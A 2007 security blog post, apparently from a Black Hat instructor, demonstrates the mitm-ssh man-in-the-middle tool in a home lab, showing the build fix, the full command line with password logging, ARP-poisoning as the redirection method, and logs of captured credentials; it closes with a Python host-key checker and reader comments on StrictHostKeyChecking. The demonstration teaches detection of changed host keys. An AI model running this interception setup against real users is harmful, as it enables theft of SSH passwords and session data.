Thursday, August 16, 2007

Loving the SSH

I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.

How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.

Speaking of SSH, one of my Black Hat students brought an SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:

In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1

I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.

I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.

richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub

Once I log in you can see the fingerprints for both keys.

Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh

..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN

Usage: mitm-ssh [option(s)]

Routes:
[:] - Static route to port on host
(for non NAT connections)

Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read

Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4 -n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli -s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied

Now I connect to localhost to show the correct key entered into known_hosts.

richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686

richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub

Now I connect to localhost port 2222 where mitm-ssh is listening.

richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri

I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:

$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub

Here is how mitm-ssh sees the activity.

WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22

[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

[MITM] Connection from UNKNOWN:48216 closed

Here's some of the info collected. First, usernames and passwords.

$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

Now data from the client.

$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22

Odd, it didn't record anything there. Here's (some) data from the server.

...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...

That file shows data from client and server.

Incidentally, SSH v1 is disabled on 10.1.13.4:

richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2

In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.
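The port 2222 session above is the case worth checking for automatically: the client already held a DSA key for localhost, was offered an unrelated RSA key, and only showed the softer "keys of different type" prompt. The Python below is an added example, not code from the original post or from mitm-ssh; it classifies an offered host key against plain (unhashed) known_hosts entries, and the function names and key blobs are constructed for illustration.

```python
import base64, hashlib, struct

def md5_fingerprint(blob_b64):
    """Colon-separated MD5 fingerprint of a key blob, the format shown in the transcripts."""
    digest = hashlib.md5(base64.b64decode(blob_b64)).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))

def parse_known_hosts(text):
    """Yield (hostnames, keytype, blob) for plain entries; skip comments, markers, hashed names."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0].startswith(("#", "@", "|")):
            continue
        yield set(fields[0].split(",")), fields[1], fields[2]

def classify_offer(known_hosts_text, host, keytype, blob_b64):
    """Return (verdict, detail) for a key of `keytype` offered by `host`."""
    known = {kt: blob for names, kt, blob in parse_known_hosts(known_hosts_text)
             if host in names}
    if not known:
        return "UNKNOWN_HOST", "no key on record; verify the fingerprint out of band"
    if keytype in known:
        if known[keytype] == blob_b64:
            return "MATCH", md5_fingerprint(blob_b64)
        return "CHANGED", "recorded %s, offered %s" % (
            md5_fingerprint(known[keytype]), md5_fingerprint(blob_b64))
    # Host is known, but only under other key types: the situation in the port 2222 session.
    return "NEW_KEY_TYPE", "host known by %s only, offered %s %s" % (
        "/".join(sorted(known)), keytype, md5_fingerprint(blob_b64))

def _constructed_blob(keytype, filler):
    """Build a syntactically plausible (not cryptographically valid) key blob for the demo."""
    name = keytype.encode()
    body = struct.pack(">I", len(name)) + name + struct.pack(">I", len(filler)) + filler
    return base64.b64encode(body).decode()

# Constructed sample data: one recorded DSA key, plus two keys that do not match it.
LEGIT_DSA = _constructed_blob("ssh-dss", b"\x01" * 64)
OFFERED_RSA = _constructed_blob("ssh-rsa", b"\x02" * 64)
OFFERED_DSA = _constructed_blob("ssh-dss", b"\x03" * 64)
KNOWN_HOSTS = "# constructed sample\nlocalhost,127.0.0.1 ssh-dss %s\n" % LEGIT_DSA

if __name__ == "__main__":
    for kt, blob in (("ssh-dss", LEGIT_DSA), ("ssh-rsa", OFFERED_RSA), ("ssh-dss", OFFERED_DSA)):
        print(kt, classify_offer(KNOWN_HOSTS, "localhost", kt, blob))
```

Treating NEW_KEY_TYPE as seriously as CHANGED closes the gap the transcript shows, where answering "yes" to the different-type prompt added the interceptor's key to known_hosts.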

4 comments:

Alex said...

I think it's pleasegivemeallyourpasswords.

But yeah, I'm not sure about feeding my ssh passwords into a site, and even though it is RoR, why would you really want to add another layer of complexity into what is essentially a security function?

It's a cool demonstration of the technology's potential, no doubt.

Richard Bejtlich said...

http://www-personal.umich.edu/~mressl/webshell/

John Ward said...

I've seen these before. I prefer Mindterm, mainly because it is a Java app that runs on the client machine, no silliness with running SSH on some unknown person's box ready to steal your passwords. Even if the site is legit, how long until they become the target for attackers looking to steal passwords from suckers using this service?

warl0ck said...

Setting StrictHostKeyChecking flag to yes is very much recommended, ssh will refuse to connect to hosts whose key has changed.